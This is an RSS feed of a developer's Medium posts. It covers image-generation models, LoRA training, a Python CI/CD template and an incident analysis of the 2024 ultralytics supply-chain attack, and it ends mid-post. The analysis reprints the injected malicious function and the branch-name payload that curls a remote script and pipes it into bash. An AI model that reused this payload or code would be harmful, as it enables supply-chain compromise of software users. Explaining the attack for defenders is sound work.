<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by 0517 jhj on Medium]]></title>
        <description><![CDATA[Stories by 0517 jhj on Medium]]></description>
        <link>https://medium.com/@developerjo0517?source=rss-d5fe4e536d4e------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/0*iLPl73yvozNiXBhn</url>
            <title>Stories by 0517 jhj on Medium</title>
            <link>https://medium.com/@developerjo0517?source=rss-d5fe4e536d4e------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Mon, 13 Apr 2026 08:02:11 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@developerjo0517/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Brief Overview of Stable Diffusion’s Development]]></title>
            <link>https://medium.com/@developerjo0517/brief-overview-of-stable-diffusions-development-07249d33bc91?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/07249d33bc91</guid>
            <category><![CDATA[lora]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[stable-diffusion]]></category>
            <category><![CDATA[image-generation]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Mon, 03 Feb 2025 17:23:07 GMT</pubDate>
            <atom:updated>2025-02-03T17:26:12.887Z</atom:updated>
            <content:encoded><![CDATA[<p>There are so many great image generation models out there these days, like many versions of Stable Diffusion and Flux. In this post, we’ll take a quick look at the different kinds of models used.</p><h3>Stable Diffusion (LDM)</h3><p><a href="https://stability.ai/news/stable-diffusion-announcement">Stability AI released its open-source Stable Diffusion model</a> in August 2022. This sparked widespread public interest in Gen AI, making image generation technology accessible to the general public.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*82l8BLpbaITnQ3H7.png" /><figcaption>Stable Diffusion Denosing Process from <a href="https://en.wikipedia.org/wiki/Stable_Diffusion">Wikipedia</a></figcaption></figure><p>Stable Diffusion’s core concept is based on a process of generating noise → and then learning to reverse this process through denoising. The Denoising UNET is the core component of a Latent Diffusion Model (LDM), responsible for the denoising process.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IEDsp-C6-NBUllGz9m5Zqw.png" /><figcaption>Diagram from <a href="https://arxiv.org/abs/2112.10752">High-Resolution Image Synthesis with Latent Diffusion Models, April 2022</a></figcaption></figure><p>The above image illustrates how the image generation works in the Latent Diffusion Model (LDM), the architecture behind the Stability AI’s open-source Stable Diffusion model.</p><p>The denoising UNET works with images in a ‘latent space,’ an encoded representation of the image derived from random seeds. Once the UNET finishes denoising, this latent representation is decoded back into a regular image. A Variational AutoEncoder (VAE) is mostly used in Stable Diffusion inference to manage the encoding and decoding of images to and from the latent space.</p><p>To incorporate text prompts, a text encoder (CLIP) tokenizes the text and embeds it into numerical values, which are then used during the UNET’s denoising process.</p><p><a href="https://stability.ai/">Stability AI</a> has led the open-source community for Stable Diffusion models. Here are some notable open-source releases based on the Latent Diffusion Model (LDM) architecture:</p><h4>SD 1.5</h4><ul><li><a href="https://huggingface.co/stable-diffusion-v1-5/stable-diffusion-v1-5">Released in October 2022 by RunwayML</a> (Mirror link provided as the official repo is no longer available somehow).</li><li>Text-to-Image, Image-to-Image, and Inpainting, among other features.</li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li><li>Compatibility with ControlNet makes it a powerful for controlling image generation based on specific poses or concepts.</li></ul><h4>SD 2</h4><ul><li><a href="https://stability.ai/news/stable-diffusion-v2-release">Released in November 2022 by Stability AI</a></li><li>Supports 768x768 resolution, an upgrade from the 512x512 resolution of previous versions.</li><li>Retrained from scratch on a filtered dataset.</li></ul><h4>SDXL</h4><ul><li><a href="https://stability.ai/news/stable-diffusion-sdxl-1-announcement">Released in July 2023 by Stability AI</a></li><li>Largest SD model in the UNET architecture</li><li>Supports 1024x1024 resolution, an upgrade from previous versions.</li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li></ul><h3>Stable Diffusion (DiT)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Da1a-athNfgIOCCIBsJcKQ.png" /><figcaption>DiT architecture from <a href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a></figcaption></figure><p>The paper “<a href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a>” (December 2022) introduced the new architecture called DiT for Stable diffusion, which is now used in many SOTA image generation models.</p><p>DiT replaces Stable Diffusion’s traditional UNET with transformer blocks for denoising.</p><p>The core concept of Stable Diffusion still remains the same: generating noise → learning to reverse this process through denoising. However, while the UNET handled this in the Latent Diffusion Model (LDM), transformer blocks now take on this responsibility in DiT.</p><p>Because DiT leverages the transformer’s attention mechanism for denoising, it demands significantly more computing resources. However, this increased computational cost translates to more coherent and detailed outputs.</p><p>Here are some notable open-source releases based on the Diffusion Transformer (DiT) architecture:</p><h4>Flux</h4><ul><li><a href="https://blackforestlabs.ai/announcing-flux-1-1-pro-and-the-bfl-api/">Released in October 2024 by Black Forest Labs</a></li><li>Currently SOTA in <a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></li><li>Great ecosystem with many custom fine-tuned models and LoRAs.</li></ul><h4>SD 3.5</h4><ul><li><a href="https://stability.ai/news/introducing-stable-diffusion-3-5">Released in October 2024 by Stability AI</a></li></ul><p>Currently, Flux stands out as a SOTA for text-to-image generation among open source models 🎉 :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*PHrCE9gZC5DycJIS.png" /><figcaption><a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></figcaption></figure><p>If you’re Interested in training your own LoRAs for image generation models, Check out this Jupyter Notebook project:</p><p><a href="https://github.com/jhj0517/finetuning-notebooks">GitHub - jhj0517/finetuning-notebooks</a></p><h3>Reference</h3><ul><li><a href="https://arxiv.org/abs/2112.10752">High-Resolution Image Synthesis with Latent Diffusion Models</a></li><li><a href="https://arxiv.org/abs/2212.09748">Scalable Diffusion Models with Transformers</a></li><li><a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=07249d33bc91" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Train Your Own LoRA Models for Hunyuan Video and Flux in Google Colab]]></title>
            <link>https://medium.com/@developerjo0517/train-your-own-lora-models-for-hunyuan-video-and-flux-in-google-colab-3fc965e325d9?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/3fc965e325d9</guid>
            <category><![CDATA[flux]]></category>
            <category><![CDATA[fine-tuning]]></category>
            <category><![CDATA[image-generation]]></category>
            <category><![CDATA[hunyuanvideo]]></category>
            <category><![CDATA[lora]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 31 Jan 2025 13:11:05 GMT</pubDate>
            <atom:updated>2025-01-31T13:11:38.881Z</atom:updated>
            <content:encoded><![CDATA[<p>By January 2025, we have some pretty good models for generating images and videos. <a href="https://github.com/black-forest-labs/flux">Flux</a> for image generation, and <a href="https://github.com/Tencent/HunyuanVideo">Hunyuan Video</a> for video generation. Let’s take a quick look at what they do.</p><h3>Flux</h3><p>Flux is an open-source image generation model from <a href="https://blackforestlabs.ai/">Black Forest Labs</a>.</p><p>On the <a href="https://huggingface.co/spaces/ArtificialAnalysis/Text-to-Image-Leaderboard">Text-to-Image leaderboard</a>, Flux is the SOTA for image generation among open-source models.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/995/1*pyKVCwE78P8QKKQyiAfcmg.png" /></figure><p>A traditional popular image generation model, <a href="https://aws.amazon.com/what-is/stable-diffusion/">Stable Diffusion</a>, uses a <a href="https://huggingface.co/docs/diffusers/main/api/models/unet2d">UNET</a> to generate image. A UNET is the core component of Stable Diffusion, responsible for generating noise → denoising it to produce the final image.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bn4iQOlM2QpeBcLcSRdaTQ.png" /><figcaption>Stable Diffusion Denosing Process from <a href="https://en.wikipedia.org/wiki/Stable_Diffusion">Wikipedia</a></figcaption></figure><p>Unlike traditional Stable Diffusion, Flux uses a <a href="https://arxiv.org/abs/2212.09748">diffusion transformer</a> architecture for image generation, as mentioned in a Black Forest Lab blog post.</p><p>You can use natural language as a prompt in Flux. With many SD models, you might have to use a sequence of words separated by commas, like “woman, photo, smile, from front.” However, with Flux, you can use a natural language, such as “A photo of a woman smiling and looking forward.” <br>In inference pipeline for Flux, this is achieved by loading two CLIP models and using both of their embeddings. For more information on how Flux works, read the <a href="https://blackforestlabs.ai/announcing-black-forest-labs/">official blog post from Black Forest Labs</a>.</p><p>If you try to run the full Flux model without any quantization, you’ll likely need quite expensive hardware. But since you can now use the <a href="https://huggingface.co/city96/FLUX.1-dev-gguf/tree/main">GGUF format</a>, you can simply select the quantized version that best fits your hardware. For example, If you have an RTX 3060 12GB GPU, <a href="https://huggingface.co/city96/FLUX.1-dev-gguf/blob/main/flux1-dev-Q5_K_S.gguf">flux1-dev-Q5_K_S.gguf</a> would fit you most.</p><p>Below image is the quality comparison between SD 3.5 vs Flux from <a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">mimicpc</a> :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aTNplsRV7hzPzO7q9bomqg.jpeg" /><figcaption>SD 3.5 vs Flux comparison from <a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">mimicpc</a></figcaption></figure><h3>Hunyuan Video</h3><p>Hunyuan Video is an open-source video generation model from <a href="https://www.tencent.com/en-us/">Tencent</a>.</p><p>I couldn’t find a proper text-to-video leaderboard on Hugging Face or elsewhere, so I can’t show you one. But here’s an example generation from <a href="https://replicate.com/tencent/hunyuan-video/examples">Replicate</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/864/1*dR0jW0r1VRCR-I4j0555zA.gif" /><figcaption>Prompt : Dynamic shot racing alongside a steam locomotive on mountain tracks, camera panning from wheels to steam billowing against snow-capped peaks. Epic scale, dramatic lighting, photorealistic detail.</figcaption></figure><p>In my opinion, Hunyuan Video is a SOTA model among open source text-to-video generation models. While Hunyuan Video does not yet support image-to-video, there are rumors that this feature may be released in Q1 2025.</p><p>Like many SOTA models today, the Hunyuan video also uses a transformer architecture, featuring its own design.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YU9iqNF6cE8xF7qqkVcd3Q.png" /><figcaption>Dual-stream to Single-stream Design from <a href="https://github.com/Tencent/HunyuanVideo?tab=readme-ov-file#-hunyuanvideo-key-features">Hunyuan Vdieo</a></figcaption></figure><p>Specifically, they use <strong>Dual-stream to Single-stream </strong>structure for video generation. In the Dual-stream phase, text and video tokens are processed independently in separate transformer blocks (each stream). Then later, in the Single-stream phase, they are concatenated and fed into subsequent transformer blocks. This design enables the model to learn its own appropriate modulation mechanisms without interference, resulting in better video generation quality.</p><p>And since video generation transformers utilize additional information across frames, Hunyuan Video uses a 3D VAE. The 3D VAE works with three dimensions: video length, space, and channels. Their compression ratios are set to 4, 8, and 16, respectively. The use of a 3D VAE significantly reduces the number of tokens for the subsequent diffusion transformer model. For more information on how it works, you can read <a href="https://arxiv.org/html/2412.03603v1">HunyuanVideo: A Systematic Framework For Large Video Generative Models</a>.</p><p>Just like Flux, even if you don’t have enough VRAM, you can still run Hunyuan video models thanks to the the <a href="https://huggingface.co/city96/HunyuanVideo-gguf/tree/main">GGUF format</a>. Simply choose the quantized version that best suits your GPU.</p><h3>Lora</h3><p><a href="https://hf.co/papers/2106.09685">LoRA (Low-Rank Adaptation of Large Language Models)</a> is a popular training technique that can fine-tune model using specific dataset. It works by inserting a smaller number of new weights into the model and only these are trained. Since you only train a small number of parameters from the base model, you can fine-tune using dataset faster, more cheaply, and with greater memory efficiency.</p><p>Once you’ve trained the model using LoRA, you’ll have a smaller, adapted model derived from the base model. This smaller LoRA model can be attached and detached to the base model in inference pipeline to get your desired result. That’s what LoRA is designed for.</p><p>Because LoRA freezes the original weights of the base model and generates the desired result by inserting a small number of new weights, it offers flexibility and nice scalability. After training a solid base model, you would prefer to have several small LoRA models instead of retraining the entire base model.</p><p>Due to its cost-effectiveness, LoRA has become a very popular training technique.</p><h3>Preparing a Dataset for LoRA Training</h3><p>The datasets often contain images paired with corresponding text files for captioning.</p><p>There’s useful information when training LoRA models with captions, a widely used technique. Let’s take a look by actually training an example LoRA model.</p><p>Here’s an example dataset with <a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">diffusers/dog-example</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IrcTHOmuTkoyMEnM61imeQ.jpeg" /><figcaption><a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">diffusers/dog-example</a></figcaption></figure><p>The dataset consists of 5 images of a puppy. The common feature among these images is that the puppy is sitting, rather than running or playing.</p><p>I want to train the model on the puppy itself, not on the concept of a “sitting puppy.” Then How should I do?</p><p>A key consideration when captioning images in a dataset is to emphasize features you want the model to learn distinctly. If there’s a specific feature you want to isolate, it’s recommended to caption it more.</p><p>For example, let’s say you want to train a Lora for a character that wears a hairpin. If you want the LoRA model to generate images of the character both with and without the hairpin, it’s recommended to include captions that specifically mention the hairpin. This principle also applies to other features, such as clothing, hairstyle, eye color, and so on.</p><p>Since I don’t want the LoRA from overfitting to the concept of “sitting,” I should specifically caption the puppy’s seated pose.</p><p>To compare the results of using captions for the seated pose versus not using them, I prepared two different datasets.</p><ol><li><a href="https://huggingface.co/datasets/jhj0517/dog-example-without-sitting">dog-example-without-sitting</a></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*h1oerCavmukzfHFezv4Hvw.jpeg" /><figcaption>Without “sitting” Captions</figcaption></figure><p>2. <a href="https://huggingface.co/datasets/jhj0517/dog-example-with-sitting">dog-example-with-sitting</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cKtiv6rOtE2panD96atc4A.jpeg" /><figcaption>With “sitting” Captions</figcaption></figure><p>They’re basically the dataset with the same images. I just made one with “sitting” in the captions and one without. I’ve temporarily named the puppy “A John’s dog” in the dataset. Since this word is used repeatedly in the captions, it will become the “trigger word” for the LoRA model.</p><p>After training each LoRA model for 1000 steps, here are some example results generated using these LoRA models with the prompt, “A John’s dog is playing with a ball in the grass.”:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yDu0Q8Kz7d_vj35ON7qYIA.jpeg" /></figure><p>The image on the left was generated using the LoRA model without the “sitting” keyword, while the image on the right used the LoRA model with the “sitting” keyword.</p><p>To me, the right image appears less overfitted to the concept of “sitting.”</p><p>The seed used was 77. You can regenerate the results or conduct further tests using these LoRA models from here:</p><ul><li><a href="https://huggingface.co/jhj0517/A-John_s-dog/blob/main/README.md">https://huggingface.co/jhj0517/A-John_s-dog</a></li></ul><p>A better example would involve a dataset with a character wearing a hairpin, hat, or some other distinctive clothing, if I could find one.</p><h3>Training LoRA with Colab</h3><p>To train LoRA models for use with Hunyuan and Flux, I recommend checking out <a href="https://github.com/ostris/ai-toolkit">ostris/ai-toolkit</a> and <a href="https://github.com/tdrussell/diffusion-pipe">tdrussell/diffusion-pipe</a>. They are great projects for fine-tuning vision generation models.</p><p>For convenience, I’ve created Jupyter Notebooks that are compatible with Google Colab.</p><p><a href="https://colab.google/">Colab</a> is Google’s Jupyter notebook hosting service, where you can rent some of Google’s computing resources to run jupyter notebook. There’re few advanges when using Colab :</p><ul><li>Free GPU runtime up to 16 GB VRAM ( T4 GPU )</li><li>Supports form fields within notebooks, which is very helpful for users who are not comfortable with coding.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*F8Duh7HpSHQproi04h4gdw.gif" /><figcaption>Form Fields</figcaption></figure><p>In my opinion, Colab is a good way to showcase your projects to those who are not interested in reading the code.</p><p>Once you have prepared the dataset, it would be nice to be able to train LoRA models by simply running the cells in order, which is achievable with Jupyter Notebooks.</p><p>If you’re interested in Lora training with notebooks, please visit:</p><p><a href="https://github.com/jhj0517/finetuning-notebooks">GitHub - jhj0517/finetuning-notebooks</a></p><h3>Reference</h3><ul><li><a href="https://github.com/black-forest-labs/flux">https://github.com/black-forest-labs/flux</a></li><li><a href="https://en.wikipedia.org/wiki/Stable_Diffusion">https://en.wikipedia.org/wiki/Stable_Diffusion</a></li><li><a href="https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better">https://www.mimicpc.com/learn/flux-vs-sd3-5-which-model-is-better</a></li><li><a href="https://github.com/Tencent/HunyuanVideo">https://github.com/Tencent/HunyuanVideo</a></li><li><a href="https://replicate.com/tencent/hunyuan-video/examples">https://replicate.com/tencent/hunyuan-video/examples</a></li><li><a href="https://huggingface.co/docs/diffusers/en/training/lora">https://huggingface.co/docs/diffusers/en/training/lora</a></li><li><a href="https://github.com/tdrussell/diffusion-pipe">https://github.com/tdrussell/diffusion-pipe</a></li><li><a href="https://github.com/ostris/ai-toolkit">https://github.com/ostris/ai-toolkit</a></li><li><a href="https://huggingface.co/datasets/diffusers/dog-example?row=4">https://huggingface.co/datasets/diffusers/dog-example?row=4</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3fc965e325d9" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Python Project Template with Basic CI/CD Pipeline on Github]]></title>
            <link>https://medium.com/@developerjo0517/python-project-template-with-basic-ci-cd-pipeline-on-github-b1954a9d8f7e?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/b1954a9d8f7e</guid>
            <category><![CDATA[python]]></category>
            <category><![CDATA[github-actions]]></category>
            <category><![CDATA[github]]></category>
            <category><![CDATA[template]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 27 Dec 2024 11:46:28 GMT</pubDate>
            <atom:updated>2024-12-27T13:03:27.095Z</atom:updated>
            <content:encoded><![CDATA[<p>When you start a new project with your team, it would be good to have some kind of nice template format for your project. For example, a typical CI/CD pipeline workflow or the coding convention documentation for your team’s work. Of course, since it’s just a template to start with, you can edit and add what you want as the project scales.</p><p>Creating <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">Github Template Repository</a> would be a good choice to achieve this, it lets you start a new project without repeating redundant things that need to be done again. For example, if your team uses Github as a project management tool, I find it cumbersome to create issues and PR templates every time I start a new project. So I’ve created a basic python template that anyone can use. We’ll look at those basic components of it in this post.</p><h4>Github Actions</h4><p>There’re basic CI/CD pipelines if you have it on Github when starting python project.</p><ol><li><strong>CI with </strong><strong>pytest</strong></li></ol><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/a3d4063ba9baebc47cd2bc39112da36f/href">https://medium.com/media/a3d4063ba9baebc47cd2bc39112da36f/href</a></iframe><p>Typically, you would have test/ directory on your project to run tests. If you have automated CI pipeline that runs python -m pytest tests everytime the commit/PR happens on master branch, that would give you better experience to your development.</p><blockquote>Note: I added “Clean up space for action” step because free github action has disk space limitation. I’ve experienced lack of disk space error when installing heavy packages (e.g. torch), this step will resolve those cases.</blockquote><p><strong>2. CD for DockerHub ( Optional )</strong></p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/61f98dbb3394f909c706276e002738dd/href">https://medium.com/media/61f98dbb3394f909c706276e002738dd/href</a></iframe><p>This is optional, only if you would have a Dockerfile for your project. The action is the pipeline for automated Dockerfile building/pushing to the DockerHub. If the process of Dockerfile building/pushing to the server is automated, you would love it for its convenience. I’ve set the auto-trigger with commits to the master branch, but you can update it in other ways, for example making release on your repository.</p><p>Since it needs DockerHub secrets from your repository to push the image, you need to register and use secrets from your repository. You can register secrets as envioronmental variables, in “Settings — Secrets and variables — Actions” tab.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p1_bxmPznO1hZa0W358uZA.png" /><figcaption>Github Action Secrets</figcaption></figure><p><strong>3. CD for PyPI Package ( Optional )</strong></p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/77f7257320d8cedbea57adad42717eca/href">https://medium.com/media/77f7257320d8cedbea57adad42717eca/href</a></iframe><p>This is also optional, only if your project is for the PyPI package. Whenever you make “release” on your repository, it will automatically build / push it to the PyPI as a package. All you have to do is edit <a href="https://github.com/jhj0517/python-project-template/blob/master/pyproject.toml">pyproject.toml</a> and <a href="https://github.com/jhj0517/python-project-template/blob/master/setup.py">setup.py</a> as your project needs. The auto-triggering of all optional workflows is disabled by default, so you can enable it only when you need it.</p><h4>Issues &amp; PR templates</h4><p>You would have your own issues &amp; PR templates for your project. If you have to make them everytime when you start a new project, it would definitely cumbersome.</p><p>You can create issue templates by placing markdown files in the <a href="https://github.com/jhj0517/python-project-template/tree/master/.github/ISSUE_TEMPLATE">.github/SSUE_TEMPLATE</a> directory. Typically you would have “bug report” and “feature request” as issue templates for the base. These are the example markdown files.</p><pre>---<br>name: Bug report<br>about: Create a report to help us improve<br>title: &#39;&#39;<br>labels: bug<br>assignees: &#39;&#39;<br>---<br><br>**Which OS are you using?**<br> - OS: [e.g. Linux or Windows]</pre><pre>---<br>name: Feature request<br>about: Any feature you want<br>title: &#39;&#39;<br>labels: enhancement<br>assignees: &#39;&#39;<br>---<br><br>**Describe feature you want**</pre><p>You can create a template for PR as well by placing <a href="https://github.com/jhj0517/python-project-template/blob/master/.github/pull_request_template.md">.github/ull_request_template.md</a> file. This is the example PR template file:</p><pre>## Related issues / PRs. Summarize issues.<br>- #<br><br>## Summarize Changes<br>1. </pre><p>Of course, you can edit or add to them as needed for your project.</p><h4>Directory Strucutre</h4><p>The final directory structure would look like this. Directories with (optional) are literally optional, you can remove them if you don’t need them.</p><pre>python-project-template/    <br>├── .github/                # GA workflows &amp; PR, Issue templates<br>├── docker/                 # (optional) Dockerfile &amp; docker-compose files related to the project.  <br>├── tests/                  # Test codes with pytest<br>├── .gitignore              # gitignore file <br>├── README.md               # README file<br>├── pyproject.toml          # (optional) PyPI package configuration file<br>├── setup.py                # (optional) PyPI package setup file<br>└── requirements.txt        # Project dependencies </pre><h4>Quick Start</h4><p>Once you have created a template repository, you can enable it to be used as a template. Go to the “Settings — General” tab and check the “Template repository” checkbox.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u6Vqo1595nJux4VE-HP8Ow.png" /><figcaption>“Template repository” Checkbox</figcaption></figure><p>Then the “Use this template” button will be appeared, you can use it as a template now.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0I7_TfC9S31O-R-kWVW_ng.png" /><figcaption>Click “Create a new repository” Button to use the Template.</figcaption></figure><p>I’ve created a template repository that anyone can use with a basic CI/CD pipeline and files. You can edit, remove or add anything as your project needs. If you’re interested, please visit:</p><p><a href="https://github.com/jhj0517/python-project-template">GitHub - jhj0517/python-project-template: Template repository for python project</a></p><h4>Reference</h4><ul><li><a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository">https://docs.github.com/en/repositories/creating-and-managing-repositories/creating-a-template-repository</a></li><li><a href="https://github.com/bmcfee/pyrubberband/blob/main/.github/workflows/publish.yml">https://github.com/bmcfee/pyrubberband/blob/main/.github/workflows/publish.yml</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b1954a9d8f7e" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Shell Injection Attack on Open Source Project with +33k Stars on Github]]></title>
            <link>https://medium.com/@developerjo0517/how-the-hacker-attacked-open-source-project-that-has-33k-stars-on-github-c84338b639c7?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/c84338b639c7</guid>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[python]]></category>
            <category><![CDATA[yolo]]></category>
            <category><![CDATA[ultralytics]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Fri, 06 Dec 2024 20:34:16 GMT</pubDate>
            <atom:updated>2024-12-26T13:13:13.680Z</atom:updated>
            <content:encoded><![CDATA[<p>On 2024–12–05, There was an attack on <a href="https://github.com/ultralytics/ultralytics">ultralytics</a>, and it was successful.</p><p>Ultralytics is widely used pakcage for object detection and segmentation, especially in many AI projects. Today, 2024–12–07, it has +33k stars on Github. One of my project also uses the package.</p><p>The attacker was <a href="https://github.com/openimbot">openimbot</a>, and managed to successfully embed this code into the ultralytics project:</p><pre>def safe_run(path):<br>    os.chmod(path, 0o770)<br>    command = [<br>        path,<br>        &#39;-u&#39;,<br>        &#39;4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw&#39;,<br>        &#39;-o&#39;,<br>        &#39;connect.consrensys.com:8080&#39;,<br>        &#39;-k&#39;<br>    ]<br>    process = subprocess.Popen(<br>        command,<br>        stdin=subprocess.DEVNULL,<br>        stdout=subprocess.DEVNULL,<br>        stderr=subprocess.DEVNULL,<br>        preexec_fn=os.setsid,<br>        close_fds=True<br>    )<br>    os.remove(path)</pre><p>What it does?</p><ul><li>It gets permission to make file executable with os.chmod.</li><li>It executes a command to connect to connect.consrensys.com:8080, which is probably running a cryptomining job. But it’s not <em>just</em> a cryptomining malware.</li><li>It installs <strong>another malicious executable</strong> file into the path.</li><li>After the file is executed, it deletes the file to remove the evidence.</li></ul><p>Since it also executes the malicious file, not just running a crypto mining job, it could be full blown infostealer malware or whatever. So I think we can say that <strong>its severity is very high</strong>.</p><p>How did the attacker get this code in? Here’s the sequence of events:</p><h4>Sequence of Events ( UTC Time )</h4><ol><li>2024–12–04 19:33 <br>- The attacker, <a href="https://github.com/openimbot">openimbot</a> made <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a></li><li>2024–12–04 19:57<br>- The attacker, <a href="https://github.com/openimbot">openimbot</a> made <a href="https://github.com/ultralytics/ultralytics/pull/18020">PR #18020</a></li><li>2024–12–04 20:50<br>- The malicious version v8.3.41 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12176650710">was released on PyPI</a> by Github Action</li><li>2024–12–05 06:34 <br>- The compromised version noticed in <a href="https://github.com/ultralytics/ultralytics/issues/18027">issue</a></li><li>2024–12–05 09:15 <br>- The v8.3.41 has been <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">removed from PyPI</a></li><li>2024–12–05 12:46<br>- The malicious version v8.3.42 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12180037832">was released on PyPI</a> by Github Action</li><li>2024–12–05 13:47 <br>- The v8.3.42 has been <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">removed from PyPI</a></li><li>2024–12–05 19:09<br>- The ultralytics team member, glenn-jocher made <a href="https://github.com/ultralytics/ultralytics/pull/18052">PR #18052</a></li><li>2024–12–05 19:47<br>- The safe version v8.3.43 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12186963815">was released on PyPI</a> by Github Action</li></ol><h4>How?</h4><p>In <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a> and <a href="https://github.com/ultralytics/ultralytics/pull/18020">PR #18020</a>, the attacker was able to trigger a Github Action for the CI/CD pipeline with malware via <a href="https://owasp.org/www-community/attacks/Command_Injection"><strong>command injection</strong></a>.</p><p>It works the same as <a href="https://learn.microsoft.com/en-us/sql/relational-databases/security/sql-injection?view=sql-server-ver16">SQL Injection</a>, that is inject the string of the commands and somehow it actually executes them. It’s very simple and easy to prevent also, but if it’s successful to do it, it can be very critical because it literally executes the command.</p><p>The details of how this was possible are well written in the <a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">Github Advisory Report</a>, which already reported this vulnerability prior to this attack.</p><p>The key point that the attacker has used is the echo of the shell in the workflow in the Action:</p><pre>run:<br>    echo &quot;github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}&quot;</pre><p>While some of you, at least me, might think that using echo in shell script is no big deal, like it’s just for logging like print. But if you’re doing something with infrastructure-related things like Github Action, and you’re able to use shell script there, <strong>echo needs to be used carefully, as it can potentially execute code with the </strong><a href="https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html"><strong>Command Substitution syntax</strong></a><strong> </strong><strong>$(...) in the shell.</strong></p><p>In short, this is what the attacker did:</p><pre>echo $((1+2))<br># prints 3</pre><p><strong>There was a line of </strong><strong>echo “${{ github.event.pull_request.head.ref }}” in the Github Action, and the</strong> <strong>attacker got the full control of the terminal in the action with its PR branch name.</strong></p><p>This was the branch name used by the attacker in <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a> :</p><pre>openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)</pre><p>This downloads and executes custom shell script file. And it triggered the deployment of the malicious version of the package. The malicious versions v8.3.41 and v8.3.42 were successfully released and listed on PyPI for more than 12~ hours.</p><p>PyPI Administrator provided the <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">timeline of the 